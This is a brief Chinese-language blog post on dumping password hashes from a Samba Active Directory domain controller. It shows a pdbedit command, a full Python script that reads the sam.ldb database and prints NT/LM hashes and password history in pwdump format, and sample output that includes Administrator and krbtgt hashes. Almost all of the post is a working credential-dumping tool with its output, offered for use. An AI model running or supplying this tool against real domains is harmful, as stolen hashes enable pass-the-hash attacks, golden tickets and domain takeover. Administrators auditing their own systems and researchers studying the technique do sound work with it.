MENU

Samba DC Hash Dump

October 9, 2017 • Security

老文章,正好遇到,记录下

获取Hash

root@samba:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:

Python Script

  • samba-pwdump.py
#!/usr/bin/env python

def get_history(attr, r):
    hashes = []
    if attr in r:
        hist = r[attr][0]
        for i in range(0, len(hist), 16):
            h = hist[i:i+16].encode('hex')
            hashes.append(h)
    return hashes


def get_hash(attr, r):
    if attr not in r:
        return ''
    else:
        return r[attr][0].encode('hex')

from samba.ndr import ndr_unpack
from samba.dcerpc import security
from ldb import Ldb
from sys import argv, exit

if len(argv) not in (2, 3):
    print('Usage: %s <path to .ldb> [-history]' % argv[0])
    print(
        "Exmpl: %s '/var/lib/samba/private/sam.ldb.d/DC=SECURUS,DC=CORP,DC=COM.ldb'" % argv[0])
    exit(2)

for r in Ldb(argv[1]).search(expression='(objectclass=user)'):
    rid = ndr_unpack(security.dom_sid, r['objectSid'][0]).split()[-1]
    username = r['sAMAccountName']

    lmhash = get_hash('dBCSPwd', r)
    nthash = get_hash('unicodePwd', r)
    print('%s:%s:%s:%s:::' % (username, rid, lmhash, nthash))

    if len(argv) == 3 and argv[2] == '-history':
        lmhistory = get_history('lmPwdHistory', r)
        nthistory = get_history('ntPwdHistory', r)

        for i, (lmhash, nthash) in enumerate(map(lambda l, n: (l, n) if l else ('', n), lmhistory[1:], nthistory[1:])):
            print('%s_history%d:%s:%s:%s:::' %
                  (username, i, rid, lmhash, nthash))

Example

root@samba:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

不是默认路径自行修改即可

References

Tags: hash, Samba
Archives QR Code
QR Code for this page
Tipping QR Code